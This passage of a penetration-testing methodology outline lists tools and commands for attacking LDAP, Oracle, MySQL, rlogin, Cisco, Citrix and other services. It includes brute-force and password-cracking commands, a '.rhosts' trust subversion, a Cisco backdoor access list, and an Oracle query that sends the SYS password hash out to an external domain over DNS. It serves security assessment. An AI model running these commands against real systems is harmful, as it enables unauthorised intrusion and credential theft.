16.15.1.1. ldapminer
16.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
16.15.1.2. luma
16.15.1.2.1. Gui based tool
16.15.1.3. ldp
16.15.1.3.1. Gui based tool
16.15.1.4. openldap
16.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
16.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
16.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
16.15.2. ldap brute force
16.15.2.1. bf_ldap
16.15.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
16.15.2.1.1.1. optional: -p port (default 389)
16.15.2.1.1.2. optional: -v (verbose mode)
16.15.2.1.1.3. optional: -P LDAP user path (default ,CN=Users,)
16.15.2.2. K0ldS
16.15.2.3. LDAP_Brute.pl
16.15.3. Examine Configuration Files
16.15.3.1. General
16.15.3.1.1. containers.ldif
16.15.3.1.2. ldap.cfg
16.15.3.1.3. ldap.conf
16.15.3.1.4. ldap.xml
16.15.3.1.5. ldap-config.xml
16.15.3.1.6. ldap-realm.xml
16.15.3.1.7. slapd.conf
16.15.3.2. IBM SecureWay V3 server
16.15.3.2.1. V3.sas.oc
16.15.3.3. Microsoft Active Directory server
16.15.3.3.1. msadClassesAttrs.ldif
16.15.3.4. Netscape Directory Server 4
16.15.3.4.1. nsslapd.sas_at.conf
16.15.3.4.2. nsslapd.sas_oc.conf
16.15.3.5. OpenLDAP directory server
16.15.3.5.1. slapd.sas_at.conf
16.15.3.5.2. slapd.sas_oc.conf
16.15.3.6. Sun ONE Directory Server 5.1
16.15.3.6.1. 75sas.ldif
16.16. PPTP/L2TP/VPN port 500/1723 open
16.16.1. Enumeration
16.16.1.1. ike-scan
16.16.1.2. ike-probe
16.16.2. Brute-Force
16.16.2.1. ike-crack
16.16.3. Reference Material
16.16.3.1. PSK cracking paper
16.16.3.2. SecurityFocus Infocus
16.16.3.3. Scanning a VPN Implementation
16.17. Modbus port 502 open
16.17.1. modscan
16.18. rlogin port 513 open
16.18.1. Rlogin Enumeration
16.18.1.1. Find the files
16.18.1.1.1. find / -name .rhosts
16.18.1.1.2. locate .rhosts
16.18.1.2. Examine Files
16.18.1.2.1. cat .rhosts
16.18.1.3. Manual Login
16.18.1.3.1. rlogin hostname -l username
16.18.1.3.2. rlogin <IP>
16.18.1.4. Subvert the files
16.18.1.4.1. echo ++ > .rhosts
16.18.2. Rlogin Brute force
16.18.2.1. Hydra
16.19. rsh port 514 open
16.19.1. Rsh Enumeration
16.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
16.19.2. Rsh Brute Force
16.19.2.1. rsh-grind
16.19.2.2. Hydra
16.19.2.3. medusa
16.20. SQL Server Port 1433 1434 open
16.20.1. SQL Enumeration
16.20.1.1. piggy
16.20.1.2. SQLPing
16.20.1.2.1. sqlping ip_address/hostname
16.20.1.3. SQLPing2
16.20.1.4. SQLPing3
16.20.1.5. SQLpoke
16.20.1.6. SQL Recon
16.20.1.7. SQLver
16.20.2. SQL Brute Force
16.20.2.1. SQLPAT
16.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
16.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
16.20.2.2. SQL Dict
16.20.2.3. SQLAT
16.20.2.4. Hydra
16.20.2.5. SQLlhf
16.20.2.6. ForceSQL
16.21. Citrix port 1494 open
16.21.1. Citrix Enumeration
16.21.1.1. Default Domain
16.21.1.2. Published Applications
16.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
16.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
16.21.2. Citrix Brute Force
16.21.2.1. bforce.js
16.21.2.2. connect.js
16.21.2.3. Citrix Brute-forcer
16.21.2.4. Reference Material
16.21.2.4.1. Hacking Citrix - the legitimate backdoor
16.21.2.4.2. Hacking Citrix - the forceful way
16.22. Oracle Port 1521 Open
16.22.1. Oracle Enumeration
16.22.1.1. oracsec
16.22.1.2. Repscan
16.22.1.3. Sidguess
16.22.1.4. Scuba
16.22.1.5. DNS/HTTP Enumeration
16.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
16.22.1.6. WinSID
16.22.1.7. Oracle default password list
16.22.1.8. TNSVer
16.22.1.8.1. tnsver host [port]
16.22.1.9. TCP Scan
16.22.1.10. Oracle TNSLSNR
16.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
16.22.1.11. TNSCmd
16.22.1.11.1. perl tnscmd.pl -h ip_address
16.22.1.11.2. perl tnscmd.pl version -h ip_address
16.22.1.11.3. perl tnscmd.pl status -h ip_address
16.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
16.22.1.12. LSNrCheck
16.22.1.13. Oracle Security Check (needs credentials)
16.22.1.14. OAT
16.22.1.14.1. sh opwg.sh -s ip_address
16.22.1.14.2. opwg.bat -s ip_address
16.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
16.22.1.15. OScanner
16.22.1.15.1. sh oscanner.sh -s ip_address
16.22.1.15.2. oscanner.exe -s ip_address
16.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
16.22.1.15.4. reportviewer.exe oscanner_saved_file.xml
16.22.1.16. NGS Squirrel for Oracle
16.22.1.17. Service Register
16.22.1.17.1. Service-register.exe ip_address
16.22.1.18. PLSQL Scanner 2008
16.22.2. Oracle Brute Force
16.22.2.1. OAK
16.22.2.1.1. ora-getsid hostname port sid_dictionary_list
16.22.2.1.2. ora-auth-alter-session host port sid username password sql
16.22.2.1.3. ora-brutesid host port start
16.22.2.1.4. ora-pwdbrute host port sid username password-file
16.22.2.1.5. ora-userenum host port sid userlistfile
16.22.2.1.6. ora-ver -e (-f -l -a) host port
16.22.2.2. breakable (Targets Application Server Port)
16.22.2.2.1. breakable.exe host url [port] [v] - host: ip_address of the Oracle Portal Server; url: PATH_INFO i.e. /pls/orasso; port: TCP port the Oracle Portal Server is serving pages from; v: verbose
16.22.2.3. SQLInjector (Targets Application Server Port)
16.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
16.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
16.22.2.4. Check Password
16.22.2.5. orabf
16.22.2.5.1. orabf [hash]:[username] [options]
16.22.2.6. thc-orakel
16.22.2.6.1. Cracker
16.22.2.6.2. Client
16.22.2.6.3. Crypto
16.22.2.7. DBVisualisor
16.22.2.7.1. Sql scripts from pentest.co.uk
16.22.2.7.2. Manual SQL input of previously reported vulnerabilities
16.22.3. Oracle Reference Material
16.22.3.1. Understanding SQL Injection
16.22.3.2. SQL Injection walkthrough
16.22.3.3. SQL Injection by example
16.22.3.4. Advanced SQL Injection in Oracle databases
16.22.3.5. Blind SQL Injection
16.22.3.6. SQL Cheatsheets
16.22.3.6.1. Untitled
16.23. NFS Port 2049 open
16.23.1. NFS Enumeration
16.23.1.1. showmount -e hostname/ip_address
16.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
16.23.2. NFS Brute Force
16.23.2.1. Interact with NFS share and try to add/delete
16.23.2.2. Exploit and Confuse Unix
16.23.3. Examine Configuration Files
16.23.3.1. /etc/exports
16.23.3.2. /etc/lib/nfs/xtab
16.23.4. nmap nse script
16.23.4.1. nfs-showmount
16.24. Compaq/HP Insight Manager Port 2301, 2381 open
16.24.1. HP Enumeration
16.24.1.1. Authentication Method
16.24.1.1.1. Host OS Authentication
16.24.1.1.2. Default Authentication
16.24.1.2. Wikto
16.24.1.3. Nstealth
16.24.2. HP Bruteforce
16.24.2.1. Hydra
16.24.2.2. Acunetix
16.24.3. Examine Configuration Files
16.24.3.1. path.properties
16.24.3.2. mx.log
16.24.3.3. CLIClientConfig.cfg
16.24.3.4. database.props
16.24.3.5. pg_hba.conf
16.24.3.6. jboss-service.xml
16.24.3.7. .namazurc
16.25. MySQL port 3306 open
16.25.1. Enumeration
16.25.1.1. nmap -A -n -p3306 <IP Address>
16.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
16.25.1.3. telnet IP_Address 3306
16.25.1.4. use test; select * from test;
16.25.1.5. To check for other DB's -- show databases
16.25.2. Administration
16.25.2.1. MySQL Network Scanner
16.25.2.2. MySQL GUI Tools
16.25.2.3. mysqlshow
16.25.2.4. mysqlbinlog
16.25.3. Manual Checks
16.25.3.1. Default usernames and passwords
16.25.3.1.1. username: root password:
16.25.3.1.2. testing
16.25.3.2. Configuration Files
16.25.3.2.1. Operating System
16.25.3.2.2. Command History
16.25.3.2.3. Log Files
16.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
16.25.3.2.5. MySQL data directory (Location specified in my.cnf)
16.25.3.2.6. SSL Check
16.25.3.3. Privilege Escalation
16.25.3.3.1. Current Level of access
16.25.3.3.2. Access passwords
16.25.3.3.3. Create a new user and grant it privileges
16.25.3.3.4. Break into a shell
16.25.4. SQL injection
16.25.4.1. mysql-miner.pl
16.25.4.1.1. mysql-miner.pl http://target/ expected_string database
16.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
16.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
16.25.5. References.
16.25.5.1. Design Weaknesses
16.25.5.1.1. MySQL running as root
16.25.5.1.2. Exposed publicly on Internet
16.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
16.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
16.26. RDesktop port 3389 open
16.26.1. Rdesktop Enumeration
16.26.1.1. Remote Desktop Connection
16.26.2. Rdesktop Bruteforce
16.26.2.1. TSGrinder
16.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
16.26.2.2. Tscrack
16.27. Sybase Port 5000+ open
16.27.1. Sybase Enumeration
16.27.1.1. sybase-version ip_address from NGS
16.27.2. Sybase Vulnerability Assessment
16.27.2.1. Use DBVisualiser
16.27.2.1.1. Sybase Security checksheet
16.27.2.1.2. Manual SQL input of previously reported vulnerabilities
16.27.2.2. NGS Squirrel for Sybase
16.28. SIP Port 5060 open
16.28.1. SIP Enumeration
16.28.1.1. netcat
16.28.1.1.1. nc IP_Address Port
16.28.1.2. sipflanker
16.28.1.2.1. python sipflanker.py 192.168.1-254
16.28.1.3. Sipscan
16.28.1.4. smap
16.28.1.4.1. smap IP_Address/Subnet_Mask
16.28.1.4.2. smap -o IP_Address/Subnet_Mask
16.28.1.4.3. smap -l IP_Address
16.28.2. SIP Packet Crafting etc.
16.28.2.1. sipsak
16.28.2.1.1. Tracing paths:- sipsak -T -s sip:[email protected]
16.28.2.1.2. Options request:- sipsak -vv -s sip:[email protected]
16.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]
16.28.2.2. siprogue
16.28.3. SIP Vulnerability Scanning/ Brute Force
16.28.3.1. tftp bruteforcer
16.28.3.1.1. Default dictionary file
16.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
16.28.3.2. VoIPaudit
16.28.3.3. SiVuS
16.28.4. Examine Configuration Files
16.28.4.1. SIPDefault.cnf
16.28.4.2. asterisk.conf
16.28.4.3. sip.conf
16.28.4.4. phone.conf
16.28.4.5. sip_notify.conf
16.28.4.6. <Ethernet address>.cfg
16.28.4.7. 000000000000.cfg
16.28.4.8. phone1.cfg
16.28.4.9. sip.cfg etc. etc.
16.29. VNC port 5900^ open
16.29.1. VNC Enumeration
16.29.1.1. Scans
16.29.1.1.1. 5900^ for direct access. 5800 for HTTP access.
16.29.2. VNC Brute Force
16.29.2.1. Password Attacks
16.29.2.1.1. Remote
16.29.2.1.2. Local
16.29.3. Examine Configuration Files
16.29.3.1. .vnc
16.29.3.2. /etc/vnc/config
16.29.3.3. $HOME/.vnc/config
16.29.3.4. /etc/sysconfig/vncservers
16.29.3.5. /etc/vnc.conf
16.30. Tor Port 9001, 9030 open
16.30.1. Tor Node Checker
16.30.1.1. Ip Pages
16.30.1.2. Kewlio.net
16.30.2. nmap NSE script
16.31. Jet Direct 9100 open
16.31.1. hijetta
17. Password cracking
17.1. Rainbow crack
17.1.1. ophcrack
17.1.2. rainbow tables
17.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
17.2. Ophcrack
17.3. Cain & Abel
17.4. John the Ripper
17.4.1. ./unshadow passwd shadow > file_to_crack
17.4.2. ./john -single file_to_crack
17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
17.4.4. ./john -show file_to_crack
17.4.5. ./john --incremental:All file_to_crack
17.5. fgdump
17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
17.6. pwdump6
17.7. medusa
17.8. LCP
17.9. L0phtcrack (Note:- This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)
17.9.1. Domain credentials
17.9.2. Sniffing
17.9.3. pwdump import
17.9.4. sam import
17.10. aiocracker
17.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
18. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared against any common vulnerabilities and exposures (CVE) that have been released and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
18.1. Manual
18.1.1. Patch Levels
18.1.2. Confirmed Vulnerabilities
18.1.2.1. Severe
18.1.2.2. High
18.1.2.3. Medium
18.1.2.4. Low
18.2. Automated
18.2.1. Reports
18.2.2. Vulnerabilities
18.2.2.1. Severe
18.2.2.2. High
18.2.2.3. Medium
18.2.2.4. Low
18.3. Tools
18.3.1. GFI
18.3.2. Nessus (Linux)
18.3.2.1. Nessus (Windows)
18.3.3. NGS Typhon
18.3.4. NGS Squirrel for Oracle
18.3.5. NGS Squirrel for SQL
18.3.6. SARA
18.3.7. MatriXay
18.3.8. BiDiBlah
18.3.9. SSA
18.3.10. Oval Interpreter
18.3.11. Xscan
18.3.12. Security Manager +
18.3.13. Inguma
18.4. Resources
18.4.1. Security Focus
18.4.2. Microsoft Security Bulletin
18.4.3. Common Vulnerabilities and Exploits (CVE)
18.4.4. National Vulnerability Database (NVD)
18.4.5. The Open Source Vulnerability Database (OSVDB)
18.4.5.1. Standalone Database
18.4.5.1.1. Update URL
18.4.6. United States Computer Emergency Response Team (US-CERT)
18.4.7. Computer Emergency Response Team
18.4.8. Mozilla Security Information
18.4.9. SANS
18.4.10. Securiteam
18.4.11. PacketStorm Security
18.4.12. Security Tracker
18.4.13. Secunia
18.4.14. Vulnerabilities.org
18.4.15. ntbugtraq
18.4.16. Wireless Vulnerabilities and Exploits (WVE)
18.5. Blogs
18.5.1. Carnal0wnage
18.5.2. Fsecure Blog
18.5.3. g0ne blog
18.5.4. GNUCitizen
18.5.5. ha.ckers Blog
18.5.6. Jeremiah Grossman Blog
18.5.7. Metasploit
18.5.8. nCircle Blogs
18.5.9. pentest mokney.net
18.5.10. Rational Security
18.5.11. Rise Security
18.5.12. Security Fix Blog
18.5.13. Software Vulnerability Exploitation Blog
18.5.14. Taosecurity Blog
19. AS/400 Auditing
19.1. Remote
19.1.1. Information Gathering
19.1.1.1. Nmap using common iSeries (AS/400) services.
19.1.1.1.1. Unsecured services (Port;name;description)
19.1.1.1.2. Secured services (Port;name;description)
19.1.1.2. NetCat (old school technique)
19.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
19.1.1.3. Banners Grabbing
19.1.1.3.1. Telnet
19.1.1.3.2. FTP
19.1.1.3.3. HTTP Banner
19.1.1.3.4. POP3
19.1.1.3.5. SNMP
19.1.1.3.6. SMTP
19.1.2. Users Enumeration
19.1.2.1. Default AS/400 users accounts
19.1.2.2. Error messages
19.1.2.2.1. Telnet Login errors
19.1.2.2.2. POP3 authentication Errors
19.1.2.3. Qsys symbolic link (if ftp is enabled)
19.1.2.3.1. ftp target | quote stat | quote site namefmt 1
19.1.2.3.2. cd /
19.1.2.3.3. quote site listfmt 1
19.1.2.3.4. mkdir temp
19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
19.1.2.3.7. dir /temp/qsys/*.usrprf
19.1.2.4. LDAP
19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
19.1.2.4.2. Tool to browse LDAP
19.1.3. Exploitation
19.1.3.1. CVE References
19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
19.1.3.2. Access with Work Station Gateway
19.1.3.2.1. http://target:5061/WSG
19.1.3.2.2. Default AS/400 accounts.
19.1.3.3. Network attacks (next release)
19.1.3.3.1. DB2
19.1.3.3.2. QSHELL
19.1.3.3.3. Hijacking Terminals
19.1.3.3.4. Trojan attacks
19.1.3.3.5. Hacking from AS/400
19.2. Local
19.2.1. System Value Security
19.2.1.1. Untitled
19.2.1.1.1. Untitled
19.2.1.2. Untitled
19.2.1.2.1. Untitled
19.2.1.3. Untitled
19.2.1.3.1. Untitled
19.2.1.4. Untitled
19.2.1.4.1. Recommended value is 30
19.2.2. Password Policy
19.2.2.1. Untitled
19.2.2.1.1. Untitled
19.2.2.2. Untitled
19.2.2.2.1. Untitled
19.2.2.3. Untitled
19.2.2.3.1. Untitled
19.2.2.4. Untitled
19.2.2.4.1. Untitled
19.2.2.5. Untitled
19.2.3. Audit level
19.2.3.1. Untitled
19.2.3.1.1. Recommended value is *SECURITY
19.2.4. Documentation
19.2.4.1. Users class
19.2.4.1.1. Untitled
19.2.4.2. System Audit Settings
19.2.4.2.1. Untitled
19.2.4.3. Special Authorities Definitions
19.2.4.3.1. Untitled
20. Bluetooth Specific Testing
20.1. Bluescanner
20.2. Bluesweep
20.3. btscanner
20.4. Redfang
20.5. Blueprint
20.6. Bluesnarfer
20.7. Bluebugger
20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
20.8. Blueserial
20.9. Bloover
20.10. Bluesniff
20.11. Exploit Frameworks
20.11.1. BlueMaho
20.11.1.1. Untitled
20.12. Resources
20.12.1. URL's
20.12.1.1. BlueStumbler.org
20.12.1.2. Bluejackq.com
20.12.1.3. Bluejacking.com
20.12.1.4. Bluejackers
20.12.1.5. bluetooth-pentest
20.12.1.6. ibluejackedyou.com
20.12.1.7. Trifinite
20.12.2. Vulnerability Information
20.12.2.1. Common Vulnerabilities and Exploits (CVE)
20.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
20.12.3. White Papers
20.12.3.1. Bluesnarfing
21. Cisco Specific Testing
21.1. Methodology
21.1.1. Scan & Fingerprint.
21.1.1.1. Untitled
21.1.1.2. Untitled
21.1.1.3. If SNMP is active, then community string guessing should be performed.
21.1.2. Credentials Guessing.
21.1.2.1. Untitled
21.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
21.1.3. Connect
21.1.3.1. Untitled
21.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
21.1.4. Check for bugs
21.1.4.1. Untitled
21.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
21.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
21.1.5. Further your attack
21.1.5.1. Untitled
21.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration is editable and changes take effect immediately, but any changes are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
21.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
21.1.5.2. Untitled
21.1.5.2.1. #> access-list 100 permit ip <IP> any
21.2. Scan & Fingerprint.
21.2.1. Port Scanning
21.2.1.1. nmap
21.2.1.1.1. Untitled
21.2.1.2. Other tools
21.2.1.2.1. Untitled
21.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
21.2.2. Fingerprinting
21.2.2.1. Untitled
21.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
21.2.2.2. Untitled
21.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
21.2.2.2.2. Untitled
21.3. Password Guessing.
21.3.1. Untitled
21.3.1.1. ./CAT -h <IP> -a password.wordlist
21.3.1.2. Untitled
21.3.2. Untitled
21.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
21.3.2.2. Untitled
21.3.3. Untitled
21.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
21.3.3.2. Untitled
21.4. SNMP Attacks.
21.4.1. Untitled
21.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
21.4.1.2. Untitled
21.4.2. Untitled
21.4.2.1. onesixtyone -c SNMP.wordlist <IP>
21.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
21.4.3. Untitled
21.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
21.4.3.2. Untitled
21.5. Connecting.
21.5.1. Telnet
21.5.1.1. Untitled
21.5.1.1.1. telnet <IP>
21.5.1.1.2. Sample Banners
21.5.2. SSH
21.5.3. Web Browser
21.5.3.1. Untitled
21.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
21.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
21.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
21.5.4. TFTP
21.5.4.1. Untitled
21.5.4.1.1. Untitled
21.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
21.5.4.2. Untitled
21.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
21.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
21.5.4.2.3. Creating backdoors in Cisco IOS using TCL
21.6. Known Bugs.
21.6.1. Attack Tools
21.6.1.1. Untitled
21.6.1.1.1. Untitled
21.6.1.2. Untitled
21.6.1.2.1. Web browse to the Cisco device: http://<IP>
21.6.1.2.2. Untitled
21.6.1.2.3. Untitled
21.6.1.2.4. Untitled
21.6.1.3. Untitled
21.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
21.6.2. Common Vulnerabilities and Exploits (CVE) Information
21.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
21.7. Configuration Files.
21.7.1. Untitled
21.7.1.1. Configuration files explained
21.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
21.7.1.1.2. Untitled
21.7.1.1.3. Untitled
21.7.1.1.4. Password Encryption Utilised
21.7.1.1.5. Untitled
21.7.1.2. Configuration Testing Tools
21.7.1.2.1. Nipper
21.7.1.2.2. fwauto (Beta)
21.8. References.
21.8.1. Cisco IOS Exploitation Techniques
22. Citrix Specific Testing
22.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.
22.2. Enumeration
22.2.1. web search
22.2.1.1. Google (GHDB)
22.2.1.1.1. ext:ica
22.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
22.2.1.1.3. [WFClient] Password= filetype:ica
22.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
22.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
22.2.1.1.6. inurl:/Citrix/Nfuse17/
22.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
22.2.1.2. Google Hacks (Author Discovered)
22.2.1.2.1. filetype:ica Username=
22.2.1.2.2. inurl:/Citrix/AccessPlatform/
22.2.1.2.3. inurl:LogonAgent/Login.asp
22.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
22.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
22.2.1.2.6. inurl:/Citrix/NFuse16
22.2.1.2.7. inurl:/Citrix/NFuse151/
22.2.1.2.8. allintitle:MetaFrame XP Login
22.2.1.2.9. allintitle:MetaFrame Presentation Server Login
22.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
22.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
22.2.1.3. Yahoo
22.2.1.3.1. originurlextension:ica
22.2.2. site search
22.2.2.1. Manual
22.2.2.1.1. review web page for useful information
22.2.2.1.2. review source for web page
22.2.3. generic
22.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
22.2.3.2. amap -bqv ip_address port_no.
22.2.4. citrix specific
22.2.4.1. enum.pl
22.2.4.1.1. perl enum.pl ip_address
22.2.4.2. enum.js
22.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
22.2.4.3. connect.js
22.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
22.2.4.4. Citrix-pa-scan
22.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
22.2.4.5. pabrute.c
22.2.4.5.1. ./pabrute pubapp list app_list ip_address
22.2.5. Default Ports
22.2.5.1. TCP
